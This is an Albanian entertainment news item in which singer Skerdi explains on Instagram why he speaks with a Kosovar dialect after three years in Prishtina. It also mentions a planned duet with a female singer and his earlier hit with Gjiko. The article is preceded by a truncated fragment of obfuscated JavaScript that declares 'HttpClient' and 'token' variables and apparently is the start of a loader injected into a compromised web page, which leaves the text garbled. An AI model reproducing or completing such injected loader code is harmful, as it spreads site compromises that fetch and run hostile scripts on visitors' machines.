;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pse flet si kosovar? – Skerdi ka një përgjigje përfundimtare

By

Shumë shpesh Skerdit, i është bërë pyetja ‘pse flet si kosovar’.

Kjo pasi që këngëtari është me origjinë nga Shqipëria dhe që në momentin kur ka nisur jetesën në Prishtinë, ai ka ndryshuar pak dialektin.

Sot Skerdi, shfrytëzoi opsionin pyetje/përgjigje në Instagram për të qenë sa më afër fansave të tij dhe padyshim nuk mungoi pyetja e lartëpërmendur.

‘Se po jetoj që tri vjet në Kosovë dhe e kam inat këtë pyetje sepse jemi të gjithë shqiptarë, s’domethënë se unë kam harruar vendin tm përkundrazi e dua më shumë se çdo vend tjetër, por dua ta di çdo dialekt’, ishte përgjigja e këngëtarit që me sa duket të jetë përfundimtare.

Përveç tjerash, përmes Instagramit, Skerdi zbuloi se nëse kënga e radhës do të ishte bashkëpunim, do ishte me një femër.

Kujtojmë që projekti i tij i fundit ishte ‘Si Bugatti’ në bashkëpunim me Gjikon – projekti i cili mori miliona klikime në youtube dhe u bë mega-hit për pak ditë./Prive.al

Artikuj të ngjashëm